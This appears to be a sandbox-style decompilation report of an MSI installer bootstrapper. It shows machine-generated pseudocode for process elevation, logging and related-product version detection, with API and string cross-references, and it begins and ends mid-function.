                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t60 = GetLastError();
                                                                                                                                                                  								__eflags = _t60;
                                                                                                                                                                  								_t83 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								__eflags = _t83;
                                                                                                                                                                  								_t79 =  >=  ? 0x80004005 : _t83;
                                                                                                                                                                  								E004300D9(0x80004005, "engine.cpp", 0x1c7, _t79);
                                                                                                                                                                  								_push("Failed to set elevated pipe into thread local storage for logging.");
                                                                                                                                                                  								goto L15;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t63 = GetLastError();
                                                                                                                                                                  							__eflags = _t63;
                                                                                                                                                                  							_t86 =  <=  ? _t63 : _t63 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							__eflags = _t86;
                                                                                                                                                                  							_t79 =  >=  ? 0x80004005 : _t86;
                                                                                                                                                                  							E004300D9(0x80004005, "engine.cpp", 0x1c2, _t79);
                                                                                                                                                                  							_push("Failed to allocate thread local storage for logging.");
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to connect to unelevated process.");
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t79 = E0040F1D5(_t75 + 0x470, __edx, _t75 + 0x46c, _t75 + 0x470);
                                                                                                                                                                  					if(_t79 >= 0) {
                                                                                                                                                                  						_push( *((intOrPtr*)(_t75 + 0x4a0)));
                                                                                                                                                                  						_t79 = E0040F5E1(_a8,  *((intOrPtr*)(_t75 + 0x2c)),  *((intOrPtr*)(_t75 + 0x46c)),  *_t69);
                                                                                                                                                                  						__eflags = _t79;
                                                                                                                                                                  						if(_t79 >= 0) {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("Failed to launch unelevated process.");
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to create implicit elevated connection name and secret.");
                                                                                                                                                                  						L15:
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						_t71 = _t79;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				E00430EA1(0, 0);
                                                                                                                                                                  				E0041783B(_t75);
                                                                                                                                                                  				_t89 = _v12;
                                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                                  					E00416439(_t71, _t89);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					ReleaseMutex(_v8);
                                                                                                                                                                  					CloseHandle(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t79;
                                                                                                                                                                  			}
















                                                                                                                                                                  APIs
                                                                                                                                                                  • ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040168E
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00401E79,?,?,?), ref: 00401697
                                                                                                                                                                    • Part of subcall function 0040F1D5: UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                    • Part of subcall function 0040F1D5: StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create implicit elevated connection name and secret., xrefs: 004014F0
                                                                                                                                                                  • Failed to connect to unelevated process., xrefs: 00401537
                                                                                                                                                                  • Failed to create the message window., xrefs: 004015E2
                                                                                                                                                                  • Failed to allocate thread local storage for logging., xrefs: 00401580
                                                                                                                                                                  • Failed to launch unelevated process., xrefs: 00401519
                                                                                                                                                                  • Failed to pump messages from parent process., xrefs: 0040165E
                                                                                                                                                                  • Failed to set elevated pipe into thread local storage for logging., xrefs: 004015C9
                                                                                                                                                                  • engine.cpp, xrefs: 00401576, 004015BF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFromHandleMutexReleaseStringUuid
                                                                                                                                                                  • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create implicit elevated connection name and secret.$Failed to create the message window.$Failed to launch unelevated process.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$engine.cpp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                                                  			E0041AD2A(void* __ecx, int __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				short _v88;
                                                                                                                                                                  				char _v92;
                                                                                                                                                                  				int _v96;
                                                                                                                                                                  				intOrPtr* _v100;
                                                                                                                                                                  				intOrPtr _v104;
                                                                                                                                                                  				char _v108;
                                                                                                                                                                  				int _v112;
                                                                                                                                                                  				int _v116;
                                                                                                                                                                  				signed int _v120;
                                                                                                                                                                  				int _v124;
                                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                                  				char _v132;
                                                                                                                                                                  				int _v136;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                  				void* _t151;
                                                                                                                                                                  				int _t159;
                                                                                                                                                                  				signed int _t160;
                                                                                                                                                                  				int _t161;
                                                                                                                                                                  				intOrPtr* _t162;
                                                                                                                                                                  				int _t168;
                                                                                                                                                                  				int _t169;
                                                                                                                                                                  				intOrPtr* _t175;
                                                                                                                                                                  				int _t178;
                                                                                                                                                                  				int _t180;
                                                                                                                                                                  				void* _t185;
                                                                                                                                                                  				intOrPtr _t194;
                                                                                                                                                                  				intOrPtr* _t201;
                                                                                                                                                                  				void* _t208;
                                                                                                                                                                  				int _t214;
                                                                                                                                                                  				intOrPtr* _t215;
                                                                                                                                                                  				int _t218;
                                                                                                                                                                  				int _t220;
                                                                                                                                                                  				intOrPtr* _t221;
                                                                                                                                                                  				intOrPtr _t222;
                                                                                                                                                                  				int _t223;
                                                                                                                                                                  				intOrPtr* _t229;
                                                                                                                                                                  				intOrPtr* _t232;
                                                                                                                                                                  				void* _t234;
                                                                                                                                                                  				int _t237;
                                                                                                                                                                  				int _t241;
                                                                                                                                                                  				intOrPtr _t243;
                                                                                                                                                                  				void* _t245;
                                                                                                                                                                  				int _t247;
                                                                                                                                                                  				intOrPtr _t249;
                                                                                                                                                                  				int _t250;
                                                                                                                                                                  				int _t254;
                                                                                                                                                                  				int _t256;
                                                                                                                                                                  				void* _t257;
                                                                                                                                                                  				void* _t258;
                                                                                                                                                                  				intOrPtr* _t261;
                                                                                                                                                                  				int _t262;
                                                                                                                                                                  				int _t263;
                                                                                                                                                                  				intOrPtr* _t265;
                                                                                                                                                                  				signed int _t266;
                                                                                                                                                                  				void* _t267;
                                                                                                                                                                  				void* _t268;
                                                                                                                                                                  
                                                                                                                                                                  				_t252 = __edx;
                                                                                                                                                                  				_t145 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t145 ^ _t266;
                                                                                                                                                                  				_v120 = _v120 | 0xffffffff;
                                                                                                                                                                  				_t232 = _a4;
                                                                                                                                                                  				_t256 = 0;
                                                                                                                                                                  				_push(0x4e);
                                                                                                                                                                  				_v104 = _a8;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v88);
                                                                                                                                                                  				_v92 = 0;
                                                                                                                                                                  				_v108 = 0;
                                                                                                                                                                  				_v96 = 0;
                                                                                                                                                                  				E004267C0(_t232, __ecx, 0, _t257, __eflags);
                                                                                                                                                                  				_t268 = _t267 + 0xc;
                                                                                                                                                                  				_push( &_v92);
                                                                                                                                                                  				_push(L"VersionString");
                                                                                                                                                                  				_t151 = 2;
                                                                                                                                                                  				_t234 = 4;
                                                                                                                                                                  				_t152 =  !=  ? _t234 : _t151;
                                                                                                                                                                  				_push( !=  ? _t234 : _t151);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( *(_t232 + 0x90));
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				asm("movlpd [ebp-0x80], xmm0");
                                                                                                                                                                  				_v124 = 0;
                                                                                                                                                                  				_t258 = E00435361(_t234);
                                                                                                                                                                  				if(_t258 < 0) {
                                                                                                                                                                  					__eflags = _t258 - 0x80070645;
                                                                                                                                                                  					if(_t258 == 0x80070645) {
                                                                                                                                                                  						L19:
                                                                                                                                                                  						 *(_t232 + 0x40) = 2;
                                                                                                                                                                  						_t259 = _t256;
                                                                                                                                                                  						L20:
                                                                                                                                                                  						_v116 = _t256;
                                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t232 + 0xc0)) - _t256;
                                                                                                                                                                  						if( *((intOrPtr*)(_t232 + 0xc0)) <= _t256) {
                                                                                                                                                                  							L76:
                                                                                                                                                                  							__eflags =  *(_t232 + 0xb8);
                                                                                                                                                                  							if( *(_t232 + 0xb8) == 0) {
                                                                                                                                                                  								L106:
                                                                                                                                                                  								if(_v108 != 0) {
                                                                                                                                                                  									E004380AB(_v108);
                                                                                                                                                                  								}
                                                                                                                                                                  								if(_v92 != 0) {
                                                                                                                                                                  									E004380AB(_v92);
                                                                                                                                                                  								}
                                                                                                                                                                  								return L004267AF(_t259, _v8 ^ _t266, _t256, _t259);
                                                                                                                                                                  							}
                                                                                                                                                                  							_t159 = _t256;
                                                                                                                                                                  							_v116 = _t256;
                                                                                                                                                                  							do {
                                                                                                                                                                  								_t254 =  *((intOrPtr*)(_t232 + 0xb4)) + _t159;
                                                                                                                                                                  								_t237 = 4;
                                                                                                                                                                  								_v112 = _t254;
                                                                                                                                                                  								__eflags =  *(_t232 + 0x40) - _t237;
                                                                                                                                                                  								if( *(_t232 + 0x40) < _t237) {
                                                                                                                                                                  									_t160 = 2;
                                                                                                                                                                  									_v120 = _t160;
                                                                                                                                                                  									L83:
                                                                                                                                                                  									_t161 = _t160 - 1;
                                                                                                                                                                  									__eflags = _t161;
                                                                                                                                                                  									if(_t161 == 0) {
                                                                                                                                                                  										 *(_t254 + 0x1c) = 2;
                                                                                                                                                                  										L99:
                                                                                                                                                                  										_t162 =  *((intOrPtr*)(_v104 + 0x10));
                                                                                                                                                                  										_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t162 + 0x38))(_t162,  *_t232,  *_t254,  *(_t254 + 0x1c)));
                                                                                                                                                                  										__eflags = _t259;
                                                                                                                                                                  										if(_t259 < 0) {
                                                                                                                                                                  											E004300D9(_t164, "msiengine.cpp", 0x26c, _t259);
                                                                                                                                                                  											_push("UX aborted detect.");
                                                                                                                                                                  											L105:
                                                                                                                                                                  											_push(_t259);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  											goto L106;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L100;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t168 = _t161 - 1;
                                                                                                                                                                  									__eflags = _t168;
                                                                                                                                                                  									if(_t168 == 0) {
                                                                                                                                                                  										 *(_t254 + 0x1c) = 1;
                                                                                                                                                                  										goto L99;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t169 = _t168 - 1;
                                                                                                                                                                  									__eflags = _t169;
                                                                                                                                                                  									if(_t169 == 0) {
                                                                                                                                                                  										 *(_t254 + 0x1c) = 3;
                                                                                                                                                                  										goto L99;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t170 = _t169 != 1;
                                                                                                                                                                  									__eflags = _t169 != 1;
                                                                                                                                                                  									if(_t169 != 1) {
                                                                                                                                                                  										_t259 = 0x8000ffff;
                                                                                                                                                                  										E004300D9(_t170, "msiengine.cpp", 0x266, 0x8000ffff);
                                                                                                                                                                  										_push("Invalid state value.");
                                                                                                                                                                  										goto L105;
                                                                                                                                                                  									}
                                                                                                                                                                  									 *(_t254 + 0x1c) = _t237;
                                                                                                                                                                  									goto L99;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t259 = E0043572E( *(_t232 + 0x90),  *_t254,  &_v120);
                                                                                                                                                                  								__eflags = _t259;
                                                                                                                                                                  								if(_t259 < 0) {
                                                                                                                                                                  									_push("Failed to query feature state.");
                                                                                                                                                                  									goto L105;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t160 = _v120;
                                                                                                                                                                  								_t254 = _v112;
                                                                                                                                                                  								__eflags = _t160 - 0xffffffff;
                                                                                                                                                                  								if(_t160 == 0xffffffff) {
                                                                                                                                                                  									_t160 = 2;
                                                                                                                                                                  									_v120 = _t160;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t237 = 4;
                                                                                                                                                                  								goto L83;
                                                                                                                                                                  								L100:
                                                                                                                                                                  								_t256 = _t256 + 1;
                                                                                                                                                                  								_t159 = _v116 + 0x28;
                                                                                                                                                                  								_v116 = _t159;
                                                                                                                                                                  								__eflags = _t256 -  *(_t232 + 0xb8);
                                                                                                                                                                  							} while (_t256 <  *(_t232 + 0xb8));
                                                                                                                                                                  							goto L106;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t241 = _t256;
                                                                                                                                                                  						_v112 = _t256;
                                                                                                                                                                  						do {
                                                                                                                                                                  							_t175 =  *((intOrPtr*)(_t232 + 0xbc)) + _t241;
                                                                                                                                                                  							_t242 =  &_v88;
                                                                                                                                                                  							_push( &_v88);
                                                                                                                                                                  							_push(_t256);
                                                                                                                                                                  							_push( *_t175);
                                                                                                                                                                  							_v100 = _t175;
                                                                                                                                                                  							_v136 = _t256;
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t259 = E004350FF();
                                                                                                                                                                  								__eflags = _t259 - 0x80070103;
                                                                                                                                                                  								if(_t259 == 0x80070103) {
                                                                                                                                                                  									goto L75;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t259;
                                                                                                                                                                  								if(_t259 < 0) {
                                                                                                                                                                  									_push("Failed to enum related products.");
                                                                                                                                                                  									goto L105;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t178 = CompareStringW(_t256, 1,  *(_t232 + 0x90), 0xffffffff,  &_v88, 0xffffffff);
                                                                                                                                                                  								__eflags = _t178 - 2;
                                                                                                                                                                  								if(_t178 == 2) {
                                                                                                                                                                  									L72:
                                                                                                                                                                  									_t261 = _v100;
                                                                                                                                                                  									L73:
                                                                                                                                                                  									_t242 =  &_v88;
                                                                                                                                                                  									_t180 = _v136 + 1;
                                                                                                                                                                  									__eflags = _t180;
                                                                                                                                                                  									_push( &_v88);
                                                                                                                                                                  									_push(_t180);
                                                                                                                                                                  									_push( *_t261);
                                                                                                                                                                  									_v136 = _t180;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t262 = E00435361(_t242,  &_v88, _t256, 2, L"VersionString",  &_v92);
                                                                                                                                                                  								__eflags = _t262 - 0x80070645;
                                                                                                                                                                  								if(_t262 == 0x80070645) {
                                                                                                                                                                  									L29:
                                                                                                                                                                  									_push( &_v92);
                                                                                                                                                                  									_push(L"VersionString");
                                                                                                                                                                  									_t185 = 4;
                                                                                                                                                                  									_push(_t185);
                                                                                                                                                                  									_push(_t256);
                                                                                                                                                                  									_push( &_v88);
                                                                                                                                                                  									_t259 = E00435361(_t242);
                                                                                                                                                                  									__eflags = _t259 - 0x80070645;
                                                                                                                                                                  									if(_t259 == 0x80070645) {
                                                                                                                                                                  										goto L72;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t259 - 0x80070648;
                                                                                                                                                                  									if(_t259 == 0x80070648) {
                                                                                                                                                                  										goto L72;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t259;
                                                                                                                                                                  									if(_t259 < 0) {
                                                                                                                                                                  										_push( &_v88);
                                                                                                                                                                  										_push("Failed to get version for product in machine context: %ls");
                                                                                                                                                                  										L93:
                                                                                                                                                                  										_push(_t259);
                                                                                                                                                                  										E00430A57();
                                                                                                                                                                  										goto L106;
                                                                                                                                                                  									}
                                                                                                                                                                  									_v96 = 1;
                                                                                                                                                                  									L33:
                                                                                                                                                                  									_t259 = E0043720F(_t252, _v92, _t256,  &_v132);
                                                                                                                                                                  									__eflags = _t259;
                                                                                                                                                                  									if(_t259 < 0) {
                                                                                                                                                                  										_push( &_v88);
                                                                                                                                                                  										L91:
                                                                                                                                                                  										E00430A57(_t259, "Failed to convert version: %ls to DWORD64 for ProductCode: %ls", _v92);
                                                                                                                                                                  										goto L106;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t261 = _v100;
                                                                                                                                                                  									_t243 = _v132;
                                                                                                                                                                  									_t194 = _v128;
                                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t261 + 0x18)) - _t256;
                                                                                                                                                                  									if( *((intOrPtr*)(_t261 + 0x18)) == _t256) {
                                                                                                                                                                  										L43:
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t261 + 0x1c)) - _t256;
                                                                                                                                                                  										if( *((intOrPtr*)(_t261 + 0x1c)) == _t256) {
                                                                                                                                                                  											L52:
                                                                                                                                                                  											_v124 = _t256;
                                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t261 + 0x34)) - _t256;
                                                                                                                                                                  											if( *((intOrPtr*)(_t261 + 0x34)) == _t256) {
                                                                                                                                                                  												L65:
                                                                                                                                                                  												__eflags =  *((intOrPtr*)(_t261 + 0x28)) - _t256;
                                                                                                                                                                  												if( *((intOrPtr*)(_t261 + 0x28)) == _t256) {
                                                                                                                                                                  													_t263 = 3;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													__eflags =  *(_t232 + 0x40) - 2;
                                                                                                                                                                  													if( *(_t232 + 0x40) != 2) {
                                                                                                                                                                  														_t263 = _t256;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t263 = 1;
                                                                                                                                                                  														 *(_t232 + 0x40) = 1;
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  												E00402003(2, 0x20000067,  &_v88);
                                                                                                                                                                  												_t268 = _t268 + 0x1c;
                                                                                                                                                                  												_t201 =  *((intOrPtr*)(_v104 + 0x10));
                                                                                                                                                                  												_t252 =  &_v88;
                                                                                                                                                                  												_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t201 + 0x30))(_t201,  *_t232,  &_v88, _v96, _v132, _v128, _t263, E0040E7BB(_v96), E0040EA3E(_v132, _v128), _v124, E0040E7D3(_t263)));
                                                                                                                                                                  												__eflags = _t259;
                                                                                                                                                                  												if(_t259 < 0) {
                                                                                                                                                                  													_push(_t259);
                                                                                                                                                                  													_push(0x23a);
                                                                                                                                                                  													L15:
                                                                                                                                                                  													_push("msiengine.cpp");
                                                                                                                                                                  													E004300D9(_t203);
                                                                                                                                                                  													_push("UX aborted detect related MSI package.");
                                                                                                                                                                  													goto L105;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													goto L72;
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = _v96 - _t256;
                                                                                                                                                                  											_push( &_v108);
                                                                                                                                                                  											_push(L"Language");
                                                                                                                                                                  											_t208 = 2;
                                                                                                                                                                  											_t245 = 4;
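                                                                                                                                                                  											/* Condition operands restored from the flags set by "__eflags = _v96 - _t256" above. */
                                                                                                                                                                  											_t209 = (_v96 != _t256) ? _t245 : _t208;
                                                                                                                                                                  											_push((_v96 != _t256) ? _t245 : _t208);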
                                                                                                                                                                  											_push(_t256);
                                                                                                                                                                  											_push( &_v88);
                                                                                                                                                                  											__eflags = E00435361(_t245);
                                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                                  												L68:
                                                                                                                                                                  												E004309F9(_t252, __eflags, _t211, 0xe0000098, _t256,  &_v88, _v108, _t256);
                                                                                                                                                                  												goto L73;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = E004346E9(_t245, _t252, _v108, _t256,  &_v124);
                                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                                  												goto L68;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t247 = _t256;
                                                                                                                                                                  											_t252 = _t256;
                                                                                                                                                                  											__eflags =  *((intOrPtr*)(_t261 + 0x34)) - _t247;
                                                                                                                                                                  											if( *((intOrPtr*)(_t261 + 0x34)) <= _t247) {
                                                                                                                                                                  												L61:
                                                                                                                                                                  												_t214 =  *(_t261 + 0x2c);
                                                                                                                                                                  												__eflags = _t214;
                                                                                                                                                                  												if(_t214 == 0) {
                                                                                                                                                                  													L64:
                                                                                                                                                                  													__eflags = _t252;
                                                                                                                                                                  													if(_t252 != 0) {
                                                                                                                                                                  														goto L73;
                                                                                                                                                                  													}
                                                                                                                                                                  													goto L65;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _t252;
                                                                                                                                                                  												if(_t252 == 0) {
                                                                                                                                                                  													goto L73;
                                                                                                                                                                  												}
                                                                                                                                                                  												__eflags = _t214;
                                                                                                                                                                  												if(_t214 != 0) {
                                                                                                                                                                  													goto L65;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L64;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t215 =  *((intOrPtr*)(_t261 + 0x30));
                                                                                                                                                                  											while(1) {
                                                                                                                                                                  												__eflags = _v124 -  *_t215;
                                                                                                                                                                  												_t261 = _v100;
                                                                                                                                                                  												if(_v124 ==  *_t215) {
                                                                                                                                                                  													break;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t247 = _t247 + 1;
                                                                                                                                                                  												_t215 = _t215 + 4;
                                                                                                                                                                  												__eflags = _t247 -  *((intOrPtr*)(_t261 + 0x34));
                                                                                                                                                                  												if(_t247 <  *((intOrPtr*)(_t261 + 0x34))) {
                                                                                                                                                                  													continue;
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L61;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t252 = 1;
                                                                                                                                                                  											__eflags = 1;
                                                                                                                                                                  											goto L61;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t261 + 0x24)) - _t256;
                                                                                                                                                                  										if( *((intOrPtr*)(_t261 + 0x24)) == _t256) {
                                                                                                                                                                  											__eflags = _t194 -  *((intOrPtr*)(_t261 + 0x14));
                                                                                                                                                                  											if(__eflags > 0) {
                                                                                                                                                                  												goto L73;
                                                                                                                                                                  											}
                                                                                                                                                                  											if(__eflags < 0) {
                                                                                                                                                                  												goto L52;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = _t243 -  *((intOrPtr*)(_t261 + 0x10));
                                                                                                                                                                  											if(_t243 >=  *((intOrPtr*)(_t261 + 0x10))) {
                                                                                                                                                                  												goto L73;
                                                                                                                                                                  											}
                                                                                                                                                                  											goto L52;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t194 -  *((intOrPtr*)(_t261 + 0x14));
                                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                                  											goto L73;
                                                                                                                                                                  										}
                                                                                                                                                                  										if(__eflags < 0) {
                                                                                                                                                                  											goto L52;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t243 -  *((intOrPtr*)(_t261 + 0x10));
                                                                                                                                                                  										if(_t243 >  *((intOrPtr*)(_t261 + 0x10))) {
                                                                                                                                                                  											goto L73;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L52;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t261 + 0x20)) - _t256;
                                                                                                                                                                  									if( *((intOrPtr*)(_t261 + 0x20)) == _t256) {
                                                                                                                                                                  										__eflags = _t194 -  *((intOrPtr*)(_t261 + 0xc));
                                                                                                                                                                  										if(__eflags < 0) {
                                                                                                                                                                  											goto L73;
                                                                                                                                                                  										}
                                                                                                                                                                  										if(__eflags > 0) {
                                                                                                                                                                  											goto L43;
                                                                                                                                                                  										}
                                                                                                                                                                  										__eflags = _t243 -  *((intOrPtr*)(_t261 + 8));
                                                                                                                                                                  										if(_t243 <=  *((intOrPtr*)(_t261 + 8))) {
                                                                                                                                                                  											goto L73;
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L43;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t194 -  *((intOrPtr*)(_t261 + 0xc));
                                                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                                                  										goto L73;
                                                                                                                                                                  									}
                                                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                                                  										goto L43;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t243 -  *((intOrPtr*)(_t261 + 8));
                                                                                                                                                                  									if(_t243 <  *((intOrPtr*)(_t261 + 8))) {
                                                                                                                                                                  										goto L73;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L43;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t262 - 0x80070648;
                                                                                                                                                                  								if(_t262 == 0x80070648) {
                                                                                                                                                                  									goto L29;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _t262;
                                                                                                                                                                  								if(_t262 < 0) {
                                                                                                                                                                  									_push( &_v88);
                                                                                                                                                                  									_push("Failed to get version for product in user unmanaged context: %ls");
                                                                                                                                                                  									goto L93;
                                                                                                                                                                  								}
                                                                                                                                                                  								_v96 = _t256;
                                                                                                                                                                  								goto L33;
                                                                                                                                                                  							}
                                                                                                                                                                  							L75:
                                                                                                                                                                  							_t218 = _v116 + 1;
                                                                                                                                                                  							_t241 = _v112 + 0x38;
                                                                                                                                                                  							_t259 = _t256;
                                                                                                                                                                  							_v116 = _t218;
                                                                                                                                                                  							_v112 = _t241;
                                                                                                                                                                  							__eflags = _t218 -  *((intOrPtr*)(_t232 + 0xc0));
                                                                                                                                                                  						} while (_t218 <  *((intOrPtr*)(_t232 + 0xc0)));
                                                                                                                                                                  						goto L76;
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t258 - 0x80070648;
                                                                                                                                                                  					if(_t258 == 0x80070648) {
                                                                                                                                                                  						goto L19;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push( *(_t232 + 0x90));
                                                                                                                                                                  					_push("Failed to get product information for ProductCode: %ls");
                                                                                                                                                                  					goto L93;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t15 = _t232 + 0xa0; // 0x158
                                                                                                                                                                  				_t220 = E0043720F(_t252, _v92, 0, _t15);
                                                                                                                                                                  				_t259 = _t220;
                                                                                                                                                                  				if(_t220 >= 0) {
                                                                                                                                                                  					_t252 =  *(_t232 + 0x98);
                                                                                                                                                                  					_t19 = _t232 + 0xa0; // 0x158
                                                                                                                                                                  					_t221 = _t19;
                                                                                                                                                                  					_t249 =  *_t221;
                                                                                                                                                                  					_t222 =  *((intOrPtr*)(_t221 + 4));
                                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t232 + 0x9c)) - _t222;
                                                                                                                                                                  					if(__eflags > 0) {
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_t223 = 2;
                                                                                                                                                                  						_v96 = _t223;
                                                                                                                                                                  						L12:
                                                                                                                                                                  						_t250 = 4;
                                                                                                                                                                  						 *(_t232 + 0x40) = _t250;
                                                                                                                                                                  						__eflags = _t223;
                                                                                                                                                                  						if(_t223 == 0) {
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						L13:
                                                                                                                                                                  						_t28 = _t232 + 0xa0; // 0x158
                                                                                                                                                                  						_t265 = _t28;
                                                                                                                                                                  						E00402003(2, 0x20000067,  *(_t232 + 0x90));
                                                                                                                                                                  						_t252 = _v96;
                                                                                                                                                                  						_t268 = _t268 + 0x1c;
                                                                                                                                                                  						_t229 =  *((intOrPtr*)(_v104 + 0x10));
                                                                                                                                                                  						_t259 = E00408843(_v104, 1,  *((intOrPtr*)( *_t229 + 0x30))(_t229,  *_t232,  *(_t232 + 0x90),  *((intOrPtr*)(_t232 + 0x14)),  *_t265,  *((intOrPtr*)(_t265 + 4)), _v96, E0040E7BB( *((intOrPtr*)(_t232 + 0x14))), E0040EA3E( *_t265,  *((intOrPtr*)(_t265 + 4))),  *((intOrPtr*)(_t232 + 0x94)), E0040E7D3(_t223)));
                                                                                                                                                                  						__eflags = _t259;
                                                                                                                                                                  						if(_t259 >= 0) {
                                                                                                                                                                  							goto L20;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(_t259);
                                                                                                                                                                  						_push(0x1b5);
                                                                                                                                                                  						goto L15;
                                                                                                                                                                  					}
                                                                                                                                                                  					if(__eflags < 0) {
                                                                                                                                                                  						L6:
                                                                                                                                                                  						_t223 = 1;
                                                                                                                                                                  						_v96 = 1;
                                                                                                                                                                  						 *(_t232 + 0x40) = 5;
                                                                                                                                                                  						goto L13;
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t252 - _t249;
                                                                                                                                                                  					if(_t252 >= _t249) {
                                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t232 + 0x9c)) - _t222;
                                                                                                                                                                  						if(__eflags < 0) {
                                                                                                                                                                  							L11:
